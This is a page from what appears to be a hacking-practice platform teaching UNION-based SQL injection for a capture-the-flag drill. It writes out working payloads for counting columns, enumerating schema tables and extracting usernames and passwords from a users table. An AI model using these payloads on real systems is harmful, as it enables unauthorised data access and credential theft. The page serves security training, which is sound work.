SQL Injection UNION Extraction
When an injectable query reflects its results, UNION SELECT turns it into a read over the whole database. Drill the column-count-to-extraction workflow.
Determine how many columns the query returns with ORDER BY or successive UNION SELECT NULLs, then find which columns are echoed back into the page.
Use the reflected columns to select from other tables — credentials, flags, schema — adapting types as needed. Variants change the column count and data types.
How the attack works
- Find the column count by incrementing until the query breaks.
' ORDER BY 4-- - - Confirm the count and locate reflected columns with marker values.
' UNION SELECT 1,2,3,4-- - - Enumerate interesting tables from the schema.
' UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- - - Extract the target data into a reflected column and read the flag.
' UNION SELECT 1,username,password,4 FROM users-- -
On PwnKata the binary, account, and paths change every rep — so you drill the recognition, not this exact command.
What you'll practice
Sourced from
SQL Injection UNION Extraction
When an injectable query reflects its results, UNION SELECT turns it into a read over the whole database. Drill the column-count-to-extraction workflow.
Recover the flag at /root/flag.txt and submit it.
Drill this now
Spin up a live isolated target and start practicing in seconds — free.